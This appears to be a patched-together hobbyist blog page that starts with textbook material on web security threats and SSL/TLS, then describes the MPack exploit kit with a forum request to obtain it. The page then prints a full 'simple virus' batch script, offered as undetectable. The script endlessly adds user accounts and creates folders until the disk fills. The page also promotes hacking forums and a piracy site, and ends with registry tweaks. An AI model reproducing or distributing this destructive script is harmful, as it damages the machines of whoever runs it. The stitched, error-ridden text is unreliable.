Web security Considerations

The WWW is fundamently a clint / server application running over the internet and TCP/IP intranets.As such, the security tools and approaches discus so far are relevent to the issue of Web security.

But, as pointed out in [GARF97], the Web presents new challenges not generally appreciated in the context of computer and network security:

> The Internet is two way. Unlike traditional publishing environment, even electronic publishing system involving teletext, voice responce, or fax-back, the Web is vulnerable to attacks on the Web server over the internet.

> The Web is increasigly serving as a highly visible outlet for corporate and product information and as the platform for business transactions.Reputations can be damaged and money can be lost if the Web server are subverted.

> Although Web browsers are very easy to use, web servers are relatively easy to configure and manage, and Web content is increasingly easy to develop, the underlying software is extraordinary complex. This complex may s/w hide many potential security flaws. The short history of the web is filled with examples of new and upgraded systems , property installed, that are vulnerable to a varity of security attacks.

> A web server can be exploited as a laun ching pad into the corporation's or agency's entire computer complex .Once the Web server is suverted, an attacker may be able to gain access to data and systems not part of the Web itself but connected to the server at the local site.

> Casual and untrained(in security measures) users are common clients for Web based services.Such users are not necessarily aware of the security risks that exists and do not have the tools or knowledge to take effective countermeasures.

SOME COMMON WEB SECURITY THREATS

This table provides a summary of the types of securit threats faced in using the Web.

	Integrity	Confidentiality	Denial of Service	Authentication
Threats	Modification of user data. Trojan horse browser Modification of memory. Modification of message traffic in transit.	Eavesdropping on the net. Theft of info from server. Theft of data from client. Info about n/w configuration. Info about which client talks to server.	Killing of user threads. Flooding machine with bogus requests. Filling up disc or memory. Isolating machine by DNS attacks.	Impersonation of legitimate users. Data forgery.
Consequences	Loss of information. Compromise of machine. Vulnerability to all other threats.	Loss of information. Loss of privacy.	Disruptive. Annoying. Prevent user from getting work done.	Misrepresentation of user. Believe that false information is valid.
Countermeasures	Cryptographic checksums.	Encryption, Web proxies.	Difficult to prevent.	Cryptographic techniques.

One way to group these threats in the terms of passive and active attacks.Passive attacks include eavesdropping on network traffic b/w browser and server and gaining access to information on a web site that is supposed to be restricted.Active attacks include impersonating another user, altering messages in transit between client and server, and altering information on a Web site.

Another way to classify Web security threats is in terms of the location of the threat: web server, Web browser, and network traffic b/w browser ans server.

From table we can easily learn the common Wev threats and way to their countermeasures.

Another relatively general-purpose solution is to implement security just above TCp.The foremost example of this approach is the Secure Socket Layer(SSL) and the follow-on Internet standard known as Transport Layer Security(TLS). At this time, their are two implementation choice.For full generally, SSL(orTLS) could be provided as part of the underlying protocol suite and theirfore be transport to applications.Alternatively, SSL can be embeded in specific packages.For example, Netscape and MS Explorer browsers come eqipped with SSL, and most Web servers have implemented the protocol.

Application-specific security servises are embeded within the particular application.The advantage of this approach is that the service can be tailored to the specific needs of a given application.In the context of Web security, an important example of this approach is Secure Electronic Transaction(SET).

DETAILED DIAGRAM ABOUT ALL THE APPROACH OF SECURITY

HTTP	FTP	SMTP
TCP
IP/IPSec

Network level Approach

HTTP	FTP	SMTP
SSL or TLS
TCP
IP

Transport layer Approach

	S/MIME	PGP	SET
Kerberos	SMTP		HTTP
UDP	TCP
IP

Application Level Approach

WE will discus leter on SSL TLS and SET in detail.

About Mpack

In computer security, MPack is a PHP-based malware kit produced by Russian crackers. The first version was released in December 2006. Since then a new version is thought to have been released roughly every month. It is thought to have been used to infect up to 160,000 PCs with keylogging software. In August 2007 it was believed to have been used in an attack on the web site of the Bank of India which originated from the Russian Business Network.

Unusual for such kits, MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits. Modules are sold by the developers containing new exploits. These cost between $50 and $150 US depending on how severe the exploit is. The developers also charge to make the scripts and executables undetectable by antivirus software.

The server-side software in the kit is able to customize attacks to a variety of web browsers including Microsoft Internet Explorer, Mozilla Firefox and Opera. MPack generally works by being loaded in an IFrame attached to the bottom of a defaced website. When a user visits the page, MPack sends a script that loads in the IFrame and determines if any vulnerabilities in the browser or operating system can be exploited. If it finds any, it will exploit them and store various statistics for future reference.

Included with the server is a management console, which allows the attacker deploying the software to view statistics about the computers that have been infected, including what web browsers they were using and what countries their connections originated from.

Experts at Spy-Ops have estimated that the market for cracker toolkits such as MPack has exploded into hundreds of millions of dollars USD annually

latest hacking tool

Its my request to you all please help me out to find this MPack its really cool

MPack is the latest and greatest tool for sale on the Russian Underground. $ash sells MPack for around $500-1,000. In a recent posting $ash attempted to sell a "loader" for $300 and a kit for $1,000. The author claims that attacks are 45-50 percent successful, including the animated cursor exploit and many others, including ANI overflow, MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow, WinZip ActiveX Overflow, QuickTime Overflow (all these are $ash names for exploits). Attacks from MPack , aka WebAttacker II, date back to October 2006 and account for roughly 10 percent of web based exploitation today according to one public source.

More than 10,000 referral domains exist in a recent MPack attack, largely successful MPack attack in Italy, compromising at least 80,000 unique IP addresses. It is likely that cPanel exploitation took place on host provider leading to injected iFrames on domains hosted on the server. When a legitimate page with a hostile iFrame is loaded the tool silently redirects the victim in an iFrame to an exploit page crafted by MPack. This exploit page, in a very controlled manner, executes exploits until exploitation is successful, and then installs malicious code of the attacker's choice.

Simple Virus Making

Simple Virus making
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any anti virusHere are some good viruses ,i am not responsible for any kind of damage to your system ... :)
Copy this to notepad and save as flood1.bat.....
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING GOTO start :start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5 :bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4 :bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat START /MIN bat4.bat GOTO bat3 :bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat START /MIN bat3.bat GOTO bat2 :bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat START /MIN bat2.bat GOTO
original :original CD %HomeDrive%\ SET lisa=1 GOTO flood1 :flood1 MKDIR lisa%lisa% SET /a lisa=%lisa%+1 GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.

some usefull sites

www.opensc.ws
www.hackforums.net
www.thepiratebay.org
www.g.ho.st

Their are two main methods to make change in registry either you manually go and make changes in the directory or write the path with string and dword value on note pad and save it with .reg extension when registry will create you can add it to original place by just clicking on it.

some commands are given below... chek it. It works for me hope it works for you also.
To open folder option when it is hide by virus

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000

To enable regedit if it is disable by virus

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

To see hiden files if unhide button is clicked

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
"checkedvalue"=dword:00000001

To enable task manager if it is disable by virus

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMGR" = Dword:000000000

even many more techniques are their you can change in the dword value to take its -ve advantage.
To Learn more about windows hacking you can visit all time popular site

www.onecomputerguy.com

Hear you can get all the tricks not only about Windows XP even for Windows Vista Windows 7 and many more......................

Windows hacking

Well friends we can do window hacking in many ways some are manually some are tools based some tools which you can use to change the look and feel of the system is RecHack, safeXP etc.

By manual we can directly change it by using some commands

1.> regedit
2.> gpedit.msc

We will discus both of them one by one
1. Registry are the basic building block of the Operating System. Their are mainly 5 types of directory exit

HKEY_CLASS_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG

It is very difficult to take backup of registries because they are always in use
for backup we have to use Backup software.

start>run>regedit ok
then you will get the registry
by changing in registry you can change the look and feel as well improve the security of your system.